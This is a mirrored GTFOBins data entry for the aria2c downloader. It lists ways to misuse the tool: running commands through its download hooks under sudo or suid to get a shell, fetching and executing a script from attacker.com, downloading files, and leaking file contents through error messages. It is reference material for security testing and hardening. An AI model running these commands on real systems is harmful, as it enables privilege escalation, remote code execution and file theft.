mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 22:46:19 +01:00
44 lines
1.4 KiB
Plaintext
---
functions:
  command:
    - code: |-
        echo /path/to/command >/path/to/temp-file
        chmod +x /path/to/temp-file
        aria2c --on-download-error=/path/to/temp-file http://some-invalid-domain
      comment: |-
        Note that the subprocess is immediately sent to the background.
      contexts:
        sudo:
        suid:
          shell: true
        unprivileged:
    - code: |-
        aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=/bin/sh http://attacker.com/aaaaaaaaaaaaaaaa
      comment: |-
        The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digits) contains the shell script, e.g., `/path/to/command`. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
      contexts:
        sudo:
        suid:
          shell: true
        unprivileged:
  download:
    - code: |-
        aria2c -o /path/to/output-file http://attacker.com/path/to/input-file
      comment: |-
        Use `--allow-overwrite` if needed. Similarly, `-o /path/to/output-file` can be omitted; in that case the file is saved to `input-file` in the current working directory.
      contexts:
        sudo:
        suid:
        unprivileged:
  file-read:
    - binary: false
      code: |-
        aria2c -i /path/to/input-file
      comment: |-
        The file is leaked as error messages.
      contexts:
        sudo:
        suid:
        unprivileged:
...